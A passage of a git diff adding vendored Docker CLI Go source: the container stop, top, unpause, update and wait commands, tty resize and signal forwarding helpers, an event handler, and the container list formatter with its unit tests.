opts.timeChanged = cmd.Flags().Changed("time") + return runStop(dockerCli, &opts) + }, + } + + flags := cmd.Flags() + flags.IntVarP(&opts.time, "time", "t", 10, "Seconds to wait for stop before killing it") + return cmd +} + +func runStop(dockerCli *command.DockerCli, opts *stopOptions) error { + ctx := context.Background() + + var timeout *time.Duration + if opts.timeChanged { + timeoutValue := time.Duration(opts.time) * time.Second + timeout = &timeoutValue + } + + var errs []string + + errChan := parallelOperation(ctx, opts.containers, func(ctx context.Context, id string) error { + return dockerCli.Client().ContainerStop(ctx, id, timeout) + }) + for _, container := range opts.containers { + if err := <-errChan; err != nil { + errs = append(errs, err.Error()) + } else { + fmt.Fprintf(dockerCli.Out(), "%s\n", container) + } + } + if len(errs) > 0 { + return fmt.Errorf("%s", strings.Join(errs, "\n")) + } + return nil +} diff --git a/vendor/github.com/docker/docker/cli/command/container/top.go b/vendor/github.com/docker/docker/cli/command/container/top.go new file mode 100644 index 0000000000..160153ba7f --- /dev/null +++ b/vendor/github.com/docker/docker/cli/command/container/top.go @@ -0,0 +1,58 @@ +package container + +import ( + "fmt" + "strings" + "text/tabwriter" + + "golang.org/x/net/context" + + "github.com/docker/docker/cli" + "github.com/docker/docker/cli/command" + "github.com/spf13/cobra" +) + +type topOptions struct { + container string + + args []string +} + +// NewTopCommand creates a new cobra.Command for `docker top` +func NewTopCommand(dockerCli *command.DockerCli) *cobra.Command { + var opts topOptions + + cmd := &cobra.Command{ + Use: "top CONTAINER [ps OPTIONS]", + Short: "Display the running processes of a container", + Args: cli.RequiresMinArgs(1), + RunE: func(cmd *cobra.Command, args []string) error { + opts.container = args[0] + opts.args = args[1:] + return runTop(dockerCli, &opts) + }, + } + + flags := cmd.Flags() + 
flags.SetInterspersed(false) + + return cmd +} + +func runTop(dockerCli *command.DockerCli, opts *topOptions) error { + ctx := context.Background() + + procList, err := dockerCli.Client().ContainerTop(ctx, opts.container, opts.args) + if err != nil { + return err + } + + w := tabwriter.NewWriter(dockerCli.Out(), 20, 1, 3, ' ', 0) + fmt.Fprintln(w, strings.Join(procList.Titles, "\t")) + + for _, proc := range procList.Processes { + fmt.Fprintln(w, strings.Join(proc, "\t")) + } + w.Flush() + return nil +} diff --git a/vendor/github.com/docker/docker/cli/command/container/tty.go b/vendor/github.com/docker/docker/cli/command/container/tty.go new file mode 100644 index 0000000000..6af8e2becf --- /dev/null +++ b/vendor/github.com/docker/docker/cli/command/container/tty.go @@ -0,0 +1,103 @@ +package container + +import ( + "fmt" + "os" + gosignal "os/signal" + "runtime" + "time" + + "github.com/Sirupsen/logrus" + "github.com/docker/docker/api/types" + "github.com/docker/docker/cli/command" + "github.com/docker/docker/client" + "github.com/docker/docker/pkg/signal" + "golang.org/x/net/context" +) + +// resizeTtyTo resizes tty to specific height and width +func resizeTtyTo(ctx context.Context, client client.ContainerAPIClient, id string, height, width uint, isExec bool) { + if height == 0 && width == 0 { + return + } + + options := types.ResizeOptions{ + Height: height, + Width: width, + } + + var err error + if isExec { + err = client.ContainerExecResize(ctx, id, options) + } else { + err = client.ContainerResize(ctx, id, options) + } + + if err != nil { + logrus.Debugf("Error resize: %s", err) + } +} + +// MonitorTtySize updates the container tty size when the terminal tty changes size +func MonitorTtySize(ctx context.Context, cli *command.DockerCli, id string, isExec bool) error { + resizeTty := func() { + height, width := cli.Out().GetTtySize() + resizeTtyTo(ctx, cli.Client(), id, height, width, isExec) + } + + resizeTty() + + if runtime.GOOS == "windows" { + go func() 
{ + prevH, prevW := cli.Out().GetTtySize() + for { + time.Sleep(time.Millisecond * 250) + h, w := cli.Out().GetTtySize() + + if prevW != w || prevH != h { + resizeTty() + } + prevH = h + prevW = w + } + }() + } else { + sigchan := make(chan os.Signal, 1) + gosignal.Notify(sigchan, signal.SIGWINCH) + go func() { + for range sigchan { + resizeTty() + } + }() + } + return nil +} + +// ForwardAllSignals forwards signals to the container +func ForwardAllSignals(ctx context.Context, cli *command.DockerCli, cid string) chan os.Signal { + sigc := make(chan os.Signal, 128) + signal.CatchAll(sigc) + go func() { + for s := range sigc { + if s == signal.SIGCHLD || s == signal.SIGPIPE { + continue + } + var sig string + for sigStr, sigN := range signal.SignalMap { + if sigN == s { + sig = sigStr + break + } + } + if sig == "" { + fmt.Fprintf(cli.Err(), "Unsupported signal: %v. Discarding.\n", s) + continue + } + + if err := cli.Client().ContainerKill(ctx, cid, sig); err != nil { + logrus.Debugf("Error sending signal: %s", err) + } + } + }() + return sigc +} diff --git a/vendor/github.com/docker/docker/cli/command/container/unpause.go b/vendor/github.com/docker/docker/cli/command/container/unpause.go new file mode 100644 index 0000000000..c4d8d4841e --- /dev/null +++ b/vendor/github.com/docker/docker/cli/command/container/unpause.go @@ -0,0 +1,50 @@ +package container + +import ( + "fmt" + "strings" + + "golang.org/x/net/context" + + "github.com/docker/docker/cli" + "github.com/docker/docker/cli/command" + "github.com/spf13/cobra" +) + +type unpauseOptions struct { + containers []string +} + +// NewUnpauseCommand creates a new cobra.Command for `docker unpause` +func NewUnpauseCommand(dockerCli *command.DockerCli) *cobra.Command { + var opts unpauseOptions + + cmd := &cobra.Command{ + Use: "unpause CONTAINER [CONTAINER...]", + Short: "Unpause all processes within one or more containers", + Args: cli.RequiresMinArgs(1), + RunE: func(cmd *cobra.Command, args []string) error { + 
opts.containers = args + return runUnpause(dockerCli, &opts) + }, + } + return cmd +} + +func runUnpause(dockerCli *command.DockerCli, opts *unpauseOptions) error { + ctx := context.Background() + + var errs []string + errChan := parallelOperation(ctx, opts.containers, dockerCli.Client().ContainerUnpause) + for _, container := range opts.containers { + if err := <-errChan; err != nil { + errs = append(errs, err.Error()) + } else { + fmt.Fprintf(dockerCli.Out(), "%s\n", container) + } + } + if len(errs) > 0 { + return fmt.Errorf("%s", strings.Join(errs, "\n")) + } + return nil +} diff --git a/vendor/github.com/docker/docker/cli/command/container/update.go b/vendor/github.com/docker/docker/cli/command/container/update.go new file mode 100644 index 0000000000..75765856c5 --- /dev/null +++ b/vendor/github.com/docker/docker/cli/command/container/update.go @@ -0,0 +1,163 @@ +package container + +import ( + "fmt" + "strings" + + "golang.org/x/net/context" + + containertypes "github.com/docker/docker/api/types/container" + "github.com/docker/docker/cli" + "github.com/docker/docker/cli/command" + runconfigopts "github.com/docker/docker/runconfig/opts" + "github.com/docker/go-units" + "github.com/spf13/cobra" +) + +type updateOptions struct { + blkioWeight uint16 + cpuPeriod int64 + cpuQuota int64 + cpuRealtimePeriod int64 + cpuRealtimeRuntime int64 + cpusetCpus string + cpusetMems string + cpuShares int64 + memoryString string + memoryReservation string + memorySwap string + kernelMemory string + restartPolicy string + + nFlag int + + containers []string +} + +// NewUpdateCommand creates a new cobra.Command for `docker update` +func NewUpdateCommand(dockerCli *command.DockerCli) *cobra.Command { + var opts updateOptions + + cmd := &cobra.Command{ + Use: "update [OPTIONS] CONTAINER [CONTAINER...]", + Short: "Update configuration of one or more containers", + Args: cli.RequiresMinArgs(1), + RunE: func(cmd *cobra.Command, args []string) error { + opts.containers = args + 
opts.nFlag = cmd.Flags().NFlag() + return runUpdate(dockerCli, &opts) + }, + } + + flags := cmd.Flags() + flags.Uint16Var(&opts.blkioWeight, "blkio-weight", 0, "Block IO (relative weight), between 10 and 1000, or 0 to disable (default 0)") + flags.Int64Var(&opts.cpuPeriod, "cpu-period", 0, "Limit CPU CFS (Completely Fair Scheduler) period") + flags.Int64Var(&opts.cpuQuota, "cpu-quota", 0, "Limit CPU CFS (Completely Fair Scheduler) quota") + flags.Int64Var(&opts.cpuRealtimePeriod, "cpu-rt-period", 0, "Limit the CPU real-time period in microseconds") + flags.Int64Var(&opts.cpuRealtimeRuntime, "cpu-rt-runtime", 0, "Limit the CPU real-time runtime in microseconds") + flags.StringVar(&opts.cpusetCpus, "cpuset-cpus", "", "CPUs in which to allow execution (0-3, 0,1)") + flags.StringVar(&opts.cpusetMems, "cpuset-mems", "", "MEMs in which to allow execution (0-3, 0,1)") + flags.Int64VarP(&opts.cpuShares, "cpu-shares", "c", 0, "CPU shares (relative weight)") + flags.StringVarP(&opts.memoryString, "memory", "m", "", "Memory limit") + flags.StringVar(&opts.memoryReservation, "memory-reservation", "", "Memory soft limit") + flags.StringVar(&opts.memorySwap, "memory-swap", "", "Swap limit equal to memory plus swap: '-1' to enable unlimited swap") + flags.StringVar(&opts.kernelMemory, "kernel-memory", "", "Kernel memory limit") + flags.StringVar(&opts.restartPolicy, "restart", "", "Restart policy to apply when a container exits") + + return cmd +} + +func runUpdate(dockerCli *command.DockerCli, opts *updateOptions) error { + var err error + + if opts.nFlag == 0 { + return fmt.Errorf("You must provide one or more flags when using this command.") + } + + var memory int64 + if opts.memoryString != "" { + memory, err = units.RAMInBytes(opts.memoryString) + if err != nil { + return err + } + } + + var memoryReservation int64 + if opts.memoryReservation != "" { + memoryReservation, err = units.RAMInBytes(opts.memoryReservation) + if err != nil { + return err + } + } + + var memorySwap 
int64 + if opts.memorySwap != "" { + if opts.memorySwap == "-1" { + memorySwap = -1 + } else { + memorySwap, err = units.RAMInBytes(opts.memorySwap) + if err != nil { + return err + } + } + } + + var kernelMemory int64 + if opts.kernelMemory != "" { + kernelMemory, err = units.RAMInBytes(opts.kernelMemory) + if err != nil { + return err + } + } + + var restartPolicy containertypes.RestartPolicy + if opts.restartPolicy != "" { + restartPolicy, err = runconfigopts.ParseRestartPolicy(opts.restartPolicy) + if err != nil { + return err + } + } + + resources := containertypes.Resources{ + BlkioWeight: opts.blkioWeight, + CpusetCpus: opts.cpusetCpus, + CpusetMems: opts.cpusetMems, + CPUShares: opts.cpuShares, + Memory: memory, + MemoryReservation: memoryReservation, + MemorySwap: memorySwap, + KernelMemory: kernelMemory, + CPUPeriod: opts.cpuPeriod, + CPUQuota: opts.cpuQuota, + CPURealtimePeriod: opts.cpuRealtimePeriod, + CPURealtimeRuntime: opts.cpuRealtimeRuntime, + } + + updateConfig := containertypes.UpdateConfig{ + Resources: resources, + RestartPolicy: restartPolicy, + } + + ctx := context.Background() + + var ( + warns []string + errs []string + ) + for _, container := range opts.containers { + r, err := dockerCli.Client().ContainerUpdate(ctx, container, updateConfig) + if err != nil { + errs = append(errs, err.Error()) + } else { + fmt.Fprintf(dockerCli.Out(), "%s\n", container) + } + warns = append(warns, r.Warnings...) 
+ } + if len(warns) > 0 { + fmt.Fprintf(dockerCli.Out(), "%s", strings.Join(warns, "\n")) + } + if len(errs) > 0 { + return fmt.Errorf("%s", strings.Join(errs, "\n")) + } + return nil +} diff --git a/vendor/github.com/docker/docker/cli/command/container/utils.go b/vendor/github.com/docker/docker/cli/command/container/utils.go new file mode 100644 index 0000000000..6bef92463c --- /dev/null +++ b/vendor/github.com/docker/docker/cli/command/container/utils.go @@ -0,0 +1,143 @@ +package container + +import ( + "strconv" + + "golang.org/x/net/context" + + "github.com/Sirupsen/logrus" + "github.com/docker/docker/api/types" + "github.com/docker/docker/api/types/events" + "github.com/docker/docker/api/types/filters" + "github.com/docker/docker/api/types/versions" + "github.com/docker/docker/cli/command" + clientapi "github.com/docker/docker/client" +) + +func waitExitOrRemoved(ctx context.Context, dockerCli *command.DockerCli, containerID string, waitRemove bool) chan int { + if len(containerID) == 0 { + // containerID can never be empty + panic("Internal Error: waitExitOrRemoved needs a containerID as parameter") + } + + var removeErr error + statusChan := make(chan int) + exitCode := 125 + + // Get events via Events API + f := filters.NewArgs() + f.Add("type", "container") + f.Add("container", containerID) + options := types.EventsOptions{ + Filters: f, + } + eventCtx, cancel := context.WithCancel(ctx) + eventq, errq := dockerCli.Client().Events(eventCtx, options) + + eventProcessor := func(e events.Message) bool { + stopProcessing := false + switch e.Status { + case "die": + if v, ok := e.Actor.Attributes["exitCode"]; ok { + code, cerr := strconv.Atoi(v) + if cerr != nil { + logrus.Errorf("failed to convert exitcode '%q' to int: %v", v, cerr) + } else { + exitCode = code + } + } + if !waitRemove { + stopProcessing = true + } else { + // If we are talking to an older daemon, `AutoRemove` is not supported. 
+ // We need to fall back to the old behavior, which is client-side removal + if versions.LessThan(dockerCli.Client().ClientVersion(), "1.25") { + go func() { + removeErr = dockerCli.Client().ContainerRemove(ctx, containerID, types.ContainerRemoveOptions{RemoveVolumes: true}) + if removeErr != nil { + logrus.Errorf("error removing container: %v", removeErr) + cancel() // cancel the event Q + } + }() + } + } + case "detach": + exitCode = 0 + stopProcessing = true + case "destroy": + stopProcessing = true + } + return stopProcessing + } + + go func() { + defer func() { + statusChan <- exitCode // must always send an exit code or the caller will block + cancel() + }() + + for { + select { + case <-eventCtx.Done(): + if removeErr != nil { + return + } + case evt := <-eventq: + if eventProcessor(evt) { + return + } + case err := <-errq: + logrus.Errorf("error getting events from daemon: %v", err) + return + } + } + }() + + return statusChan +} + +// getExitCode performs an inspect on the container. It returns +// the running state and the exit code. +func getExitCode(ctx context.Context, dockerCli *command.DockerCli, containerID string) (bool, int, error) { + c, err := dockerCli.Client().ContainerInspect(ctx, containerID) + if err != nil { + // If we can't connect, then the daemon probably died. 
+ if !clientapi.IsErrConnectionFailed(err) { + return false, -1, err + } + return false, -1, nil + } + return c.State.Running, c.State.ExitCode, nil +} + +func parallelOperation(ctx context.Context, containers []string, op func(ctx context.Context, container string) error) chan error { + if len(containers) == 0 { + return nil + } + const defaultParallel int = 50 + sem := make(chan struct{}, defaultParallel) + errChan := make(chan error) + + // make sure result is printed in correct order + output := map[string]chan error{} + for _, c := range containers { + output[c] = make(chan error, 1) + } + go func() { + for _, c := range containers { + err := <-output[c] + errChan <- err + } + }() + + go func() { + for _, c := range containers { + sem <- struct{}{} // Wait for active queue sem to drain. + go func(container string) { + output[container] <- op(ctx, container) + <-sem + }(c) + } + }() + return errChan +} diff --git a/vendor/github.com/docker/docker/cli/command/container/wait.go b/vendor/github.com/docker/docker/cli/command/container/wait.go new file mode 100644 index 0000000000..19ccf7ac25 --- /dev/null +++ b/vendor/github.com/docker/docker/cli/command/container/wait.go @@ -0,0 +1,50 @@ +package container + +import ( + "fmt" + "strings" + + "golang.org/x/net/context" + + "github.com/docker/docker/cli" + "github.com/docker/docker/cli/command" + "github.com/spf13/cobra" +) + +type waitOptions struct { + containers []string +} + +// NewWaitCommand creates a new cobra.Command for `docker wait` +func NewWaitCommand(dockerCli *command.DockerCli) *cobra.Command { + var opts waitOptions + + cmd := &cobra.Command{ + Use: "wait CONTAINER [CONTAINER...]", + Short: "Block until one or more containers stop, then print their exit codes", + Args: cli.RequiresMinArgs(1), + RunE: func(cmd *cobra.Command, args []string) error { + opts.containers = args + return runWait(dockerCli, &opts) + }, + } + return cmd +} + +func runWait(dockerCli *command.DockerCli, opts *waitOptions) error 
{ + ctx := context.Background() + + var errs []string + for _, container := range opts.containers { + status, err := dockerCli.Client().ContainerWait(ctx, container) + if err != nil { + errs = append(errs, err.Error()) + } else { + fmt.Fprintf(dockerCli.Out(), "%d\n", status) + } + } + if len(errs) > 0 { + return fmt.Errorf("%s", strings.Join(errs, "\n")) + } + return nil +} diff --git a/vendor/github.com/docker/docker/cli/command/events_utils.go b/vendor/github.com/docker/docker/cli/command/events_utils.go new file mode 100644 index 0000000000..e710c97576 --- /dev/null +++ b/vendor/github.com/docker/docker/cli/command/events_utils.go @@ -0,0 +1,49 @@ +package command + +import ( + "sync" + + "github.com/Sirupsen/logrus" + eventtypes "github.com/docker/docker/api/types/events" +) + +type eventProcessor func(eventtypes.Message, error) error + +// EventHandler is abstract interface for user to customize +// own handle functions of each type of events +type EventHandler interface { + Handle(action string, h func(eventtypes.Message)) + Watch(c <-chan eventtypes.Message) +} + +// InitEventHandler initializes and returns an EventHandler +func InitEventHandler() EventHandler { + return &eventHandler{handlers: make(map[string]func(eventtypes.Message))} +} + +type eventHandler struct { + handlers map[string]func(eventtypes.Message) + mu sync.Mutex +} + +func (w *eventHandler) Handle(action string, h func(eventtypes.Message)) { + w.mu.Lock() + w.handlers[action] = h + w.mu.Unlock() +} + +// Watch ranges over the passed in event chan and processes the events based on the +// handlers created for a given action. +// To stop watching, close the event chan. 
+func (w *eventHandler) Watch(c <-chan eventtypes.Message) { + for e := range c { + w.mu.Lock() + h, exists := w.handlers[e.Action] + w.mu.Unlock() + if !exists { + continue + } + logrus.Debugf("event handler: received event: %v", e) + go h(e) + } +} diff --git a/vendor/github.com/docker/docker/cli/command/formatter/container.go b/vendor/github.com/docker/docker/cli/command/formatter/container.go new file mode 100644 index 0000000000..6273453355 --- /dev/null +++ b/vendor/github.com/docker/docker/cli/command/formatter/container.go @@ -0,0 +1,235 @@ +package formatter + +import ( + "fmt" + "strconv" + "strings" + "time" + + "github.com/docker/docker/api" + "github.com/docker/docker/api/types" + "github.com/docker/docker/pkg/stringid" + "github.com/docker/docker/pkg/stringutils" + units "github.com/docker/go-units" +) + +const ( + defaultContainerTableFormat = "table {{.ID}}\t{{.Image}}\t{{.Command}}\t{{.RunningFor}} ago\t{{.Status}}\t{{.Ports}}\t{{.Names}}" + + containerIDHeader = "CONTAINER ID" + namesHeader = "NAMES" + commandHeader = "COMMAND" + runningForHeader = "CREATED" + statusHeader = "STATUS" + portsHeader = "PORTS" + mountsHeader = "MOUNTS" + localVolumes = "LOCAL VOLUMES" + networksHeader = "NETWORKS" +) + +// NewContainerFormat returns a Format for rendering using a Context +func NewContainerFormat(source string, quiet bool, size bool) Format { + switch source { + case TableFormatKey: + if quiet { + return defaultQuietFormat + } + format := defaultContainerTableFormat + if size { + format += `\t{{.Size}}` + } + return Format(format) + case RawFormatKey: + if quiet { + return `container_id: {{.ID}}` + } + format := `container_id: {{.ID}} +image: {{.Image}} +command: {{.Command}} +created_at: {{.CreatedAt}} +status: {{- pad .Status 1 0}} +names: {{.Names}} +labels: {{- pad .Labels 1 0}} +ports: {{- pad .Ports 1 0}} +` + if size { + format += `size: {{.Size}}\n` + } + return Format(format) + } + return Format(source) +} + +// ContainerWrite renders the 
context for a list of containers +func ContainerWrite(ctx Context, containers []types.Container) error { + render := func(format func(subContext subContext) error) error { + for _, container := range containers { + err := format(&containerContext{trunc: ctx.Trunc, c: container}) + if err != nil { + return err + } + } + return nil + } + return ctx.Write(&containerContext{}, render) +} + +type containerContext struct { + HeaderContext + trunc bool + c types.Container +} + +func (c *containerContext) MarshalJSON() ([]byte, error) { + return marshalJSON(c) +} + +func (c *containerContext) ID() string { + c.AddHeader(containerIDHeader) + if c.trunc { + return stringid.TruncateID(c.c.ID) + } + return c.c.ID +} + +func (c *containerContext) Names() string { + c.AddHeader(namesHeader) + names := stripNamePrefix(c.c.Names) + if c.trunc { + for _, name := range names { + if len(strings.Split(name, "/")) == 1 { + names = []string{name} + break + } + } + } + return strings.Join(names, ",") +} + +func (c *containerContext) Image() string { + c.AddHeader(imageHeader) + if c.c.Image == "" { + return "" + } + if c.trunc { + if trunc := stringid.TruncateID(c.c.ImageID); trunc == stringid.TruncateID(c.c.Image) { + return trunc + } + } + return c.c.Image +} + +func (c *containerContext) Command() string { + c.AddHeader(commandHeader) + command := c.c.Command + if c.trunc { + command = stringutils.Ellipsis(command, 20) + } + return strconv.Quote(command) +} + +func (c *containerContext) CreatedAt() string { + c.AddHeader(createdAtHeader) + return time.Unix(int64(c.c.Created), 0).String() +} + +func (c *containerContext) RunningFor() string { + c.AddHeader(runningForHeader) + createdAt := time.Unix(int64(c.c.Created), 0) + return units.HumanDuration(time.Now().UTC().Sub(createdAt)) +} + +func (c *containerContext) Ports() string { + c.AddHeader(portsHeader) + return api.DisplayablePorts(c.c.Ports) +} + +func (c *containerContext) Status() string { + c.AddHeader(statusHeader) + return 
c.c.Status +} + +func (c *containerContext) Size() string { + c.AddHeader(sizeHeader) + srw := units.HumanSizeWithPrecision(float64(c.c.SizeRw), 3) + sv := units.HumanSizeWithPrecision(float64(c.c.SizeRootFs), 3) + + sf := srw + if c.c.SizeRootFs > 0 { + sf = fmt.Sprintf("%s (virtual %s)", srw, sv) + } + return sf +} + +func (c *containerContext) Labels() string { + c.AddHeader(labelsHeader) + if c.c.Labels == nil { + return "" + } + + var joinLabels []string + for k, v := range c.c.Labels { + joinLabels = append(joinLabels, fmt.Sprintf("%s=%s", k, v)) + } + return strings.Join(joinLabels, ",") +} + +func (c *containerContext) Label(name string) string { + n := strings.Split(name, ".") + r := strings.NewReplacer("-", " ", "_", " ") + h := r.Replace(n[len(n)-1]) + + c.AddHeader(h) + + if c.c.Labels == nil { + return "" + } + return c.c.Labels[name] +} + +func (c *containerContext) Mounts() string { + c.AddHeader(mountsHeader) + + var name string + var mounts []string + for _, m := range c.c.Mounts { + if m.Name == "" { + name = m.Source + } else { + name = m.Name + } + if c.trunc { + name = stringutils.Ellipsis(name, 15) + } + mounts = append(mounts, name) + } + return strings.Join(mounts, ",") +} + +func (c *containerContext) LocalVolumes() string { + c.AddHeader(localVolumes) + + count := 0 + for _, m := range c.c.Mounts { + if m.Driver == "local" { + count++ + } + } + + return fmt.Sprintf("%d", count) +} + +func (c *containerContext) Networks() string { + c.AddHeader(networksHeader) + + if c.c.NetworkSettings == nil { + return "" + } + + networks := []string{} + for k := range c.c.NetworkSettings.Networks { + networks = append(networks, k) + } + + return strings.Join(networks, ",") +} diff --git a/vendor/github.com/docker/docker/cli/command/formatter/container_test.go b/vendor/github.com/docker/docker/cli/command/formatter/container_test.go new file mode 100644 index 0000000000..16137897b9 --- /dev/null +++ 
b/vendor/github.com/docker/docker/cli/command/formatter/container_test.go @@ -0,0 +1,398 @@ +package formatter + +import ( + "bytes" + "encoding/json" + "fmt" + "strings" + "testing" + "time" + + "github.com/docker/docker/api/types" + "github.com/docker/docker/pkg/stringid" + "github.com/docker/docker/pkg/testutil/assert" +) + +func TestContainerPsContext(t *testing.T) { + containerID := stringid.GenerateRandomID() + unix := time.Now().Add(-65 * time.Second).Unix() + + var ctx containerContext + cases := []struct { + container types.Container + trunc bool + expValue string + expHeader string + call func() string + }{ + {types.Container{ID: containerID}, true, stringid.TruncateID(containerID), containerIDHeader, ctx.ID}, + {types.Container{ID: containerID}, false, containerID, containerIDHeader, ctx.ID}, + {types.Container{Names: []string{"/foobar_baz"}}, true, "foobar_baz", namesHeader, ctx.Names}, + {types.Container{Image: "ubuntu"}, true, "ubuntu", imageHeader, ctx.Image}, + {types.Container{Image: "verylongimagename"}, true, "verylongimagename", imageHeader, ctx.Image}, + {types.Container{Image: "verylongimagename"}, false, "verylongimagename", imageHeader, ctx.Image}, + {types.Container{ + Image: "a5a665ff33eced1e0803148700880edab4", + ImageID: "a5a665ff33eced1e0803148700880edab4269067ed77e27737a708d0d293fbf5", + }, + true, + "a5a665ff33ec", + imageHeader, + ctx.Image, + }, + {types.Container{ + Image: "a5a665ff33eced1e0803148700880edab4", + ImageID: "a5a665ff33eced1e0803148700880edab4269067ed77e27737a708d0d293fbf5", + }, + false, + "a5a665ff33eced1e0803148700880edab4", + imageHeader, + ctx.Image, + }, + {types.Container{Image: ""}, true, "", imageHeader, ctx.Image}, + {types.Container{Command: "sh -c 'ls -la'"}, true, `"sh -c 'ls -la'"`, commandHeader, ctx.Command}, + {types.Container{Created: unix}, true, time.Unix(unix, 0).String(), createdAtHeader, ctx.CreatedAt}, + {types.Container{Ports: []types.Port{{PrivatePort: 8080, PublicPort: 8080, Type: "tcp"}}}, 
true, "8080/tcp", portsHeader, ctx.Ports}, + {types.Container{Status: "RUNNING"}, true, "RUNNING", statusHeader, ctx.Status}, + {types.Container{SizeRw: 10}, true, "10 B", sizeHeader, ctx.Size}, + {types.Container{SizeRw: 10, SizeRootFs: 20}, true, "10 B (virtual 20 B)", sizeHeader, ctx.Size}, + {types.Container{}, true, "", labelsHeader, ctx.Labels}, + {types.Container{Labels: map[string]string{"cpu": "6", "storage": "ssd"}}, true, "cpu=6,storage=ssd", labelsHeader, ctx.Labels}, + {types.Container{Created: unix}, true, "About a minute", runningForHeader, ctx.RunningFor}, + {types.Container{ + Mounts: []types.MountPoint{ + { + Name: "this-is-a-long-volume-name-and-will-be-truncated-if-trunc-is-set", + Driver: "local", + Source: "/a/path", + }, + }, + }, true, "this-is-a-lo...", mountsHeader, ctx.Mounts}, + {types.Container{ + Mounts: []types.MountPoint{ + { + Driver: "local", + Source: "/a/path", + }, + }, + }, false, "/a/path", mountsHeader, ctx.Mounts}, + {types.Container{ + Mounts: []types.MountPoint{ + { + Name: "733908409c91817de8e92b0096373245f329f19a88e2c849f02460e9b3d1c203", + Driver: "local", + Source: "/a/path", + }, + }, + }, false, "733908409c91817de8e92b0096373245f329f19a88e2c849f02460e9b3d1c203", mountsHeader, ctx.Mounts}, + } + + for _, c := range cases { + ctx = containerContext{c: c.container, trunc: c.trunc} + v := c.call() + if strings.Contains(v, ",") { + compareMultipleValues(t, v, c.expValue) + } else if v != c.expValue { + t.Fatalf("Expected %s, was %s\n", c.expValue, v) + } + + h := ctx.FullHeader() + if h != c.expHeader { + t.Fatalf("Expected %s, was %s\n", c.expHeader, h) + } + } + + c1 := types.Container{Labels: map[string]string{"com.docker.swarm.swarm-id": "33", "com.docker.swarm.node_name": "ubuntu"}} + ctx = containerContext{c: c1, trunc: true} + + sid := ctx.Label("com.docker.swarm.swarm-id") + node := ctx.Label("com.docker.swarm.node_name") + if sid != "33" { + t.Fatalf("Expected 33, was %s\n", sid) + } + + if node != "ubuntu" { + 
t.Fatalf("Expected ubuntu, was %s\n", node) + } + + h := ctx.FullHeader() + if h != "SWARM ID\tNODE NAME" { + t.Fatalf("Expected %s, was %s\n", "SWARM ID\tNODE NAME", h) + + } + + c2 := types.Container{} + ctx = containerContext{c: c2, trunc: true} + + label := ctx.Label("anything.really") + if label != "" { + t.Fatalf("Expected an empty string, was %s", label) + } + + ctx = containerContext{c: c2, trunc: true} + FullHeader := ctx.FullHeader() + if FullHeader != "" { + t.Fatalf("Expected FullHeader to be empty, was %s", FullHeader) + } + +} + +func TestContainerContextWrite(t *testing.T) { + unixTime := time.Now().AddDate(0, 0, -1).Unix() + expectedTime := time.Unix(unixTime, 0).String() + + cases := []struct { + context Context + expected string + }{ + // Errors + { + Context{Format: "{{InvalidFunction}}"}, + `Template parsing error: template: :1: function "InvalidFunction" not defined +`, + }, + { + Context{Format: "{{nil}}"}, + `Template parsing error: template: :1:2: executing "" at : nil is not a command +`, + }, + // Table Format + { + Context{Format: NewContainerFormat("table", false, true)}, + `CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES SIZE +containerID1 ubuntu "" 24 hours ago foobar_baz 0 B +containerID2 ubuntu "" 24 hours ago foobar_bar 0 B +`, + }, + { + Context{Format: NewContainerFormat("table", false, false)}, + `CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES +containerID1 ubuntu "" 24 hours ago foobar_baz +containerID2 ubuntu "" 24 hours ago foobar_bar +`, + }, + { + Context{Format: NewContainerFormat("table {{.Image}}", false, false)}, + "IMAGE\nubuntu\nubuntu\n", + }, + { + Context{Format: NewContainerFormat("table {{.Image}}", false, true)}, + "IMAGE\nubuntu\nubuntu\n", + }, + { + Context{Format: NewContainerFormat("table {{.Image}}", true, false)}, + "IMAGE\nubuntu\nubuntu\n", + }, + { + Context{Format: NewContainerFormat("table", true, false)}, + "containerID1\ncontainerID2\n", + }, + // Raw Format + { + Context{Format: 
NewContainerFormat("raw", false, false)}, + fmt.Sprintf(`container_id: containerID1 +image: ubuntu +command: "" +created_at: %s +status: +names: foobar_baz +labels: +ports: + +container_id: containerID2 +image: ubuntu +command: "" +created_at: %s +status: +names: foobar_bar +labels: +ports: + +`, expectedTime, expectedTime), + }, + { + Context{Format: NewContainerFormat("raw", false, true)}, + fmt.Sprintf(`container_id: containerID1 +image: ubuntu +command: "" +created_at: %s +status: +names: foobar_baz +labels: +ports: +size: 0 B + +container_id: containerID2 +image: ubuntu +command: "" +created_at: %s +status: +names: foobar_bar +labels: +ports: +size: 0 B + +`, expectedTime, expectedTime), + }, + { + Context{Format: NewContainerFormat("raw", true, false)}, + "container_id: containerID1\ncontainer_id: containerID2\n", + }, + // Custom Format + { + Context{Format: "{{.Image}}"}, + "ubuntu\nubuntu\n", + }, + { + Context{Format: NewContainerFormat("{{.Image}}", false, true)}, + "ubuntu\nubuntu\n", + }, + } + + for _, testcase := range cases { + containers := []types.Container{ + {ID: "containerID1", Names: []string{"/foobar_baz"}, Image: "ubuntu", Created: unixTime}, + {ID: "containerID2", Names: []string{"/foobar_bar"}, Image: "ubuntu", Created: unixTime}, + } + out := bytes.NewBufferString("") + testcase.context.Output = out + err := ContainerWrite(testcase.context, containers) + if err != nil { + assert.Error(t, err, testcase.expected) + } else { + assert.Equal(t, out.String(), testcase.expected) + } + } +} + +func TestContainerContextWriteWithNoContainers(t *testing.T) { + out := bytes.NewBufferString("") + containers := []types.Container{} + + contexts := []struct { + context Context + expected string + }{ + { + Context{ + Format: "{{.Image}}", + Output: out, + }, + "", + }, + { + Context{ + Format: "table {{.Image}}", + Output: out, + }, + "IMAGE\n", + }, + { + Context{ + Format: NewContainerFormat("{{.Image}}", false, true), + Output: out, + }, + "", + }, + { 
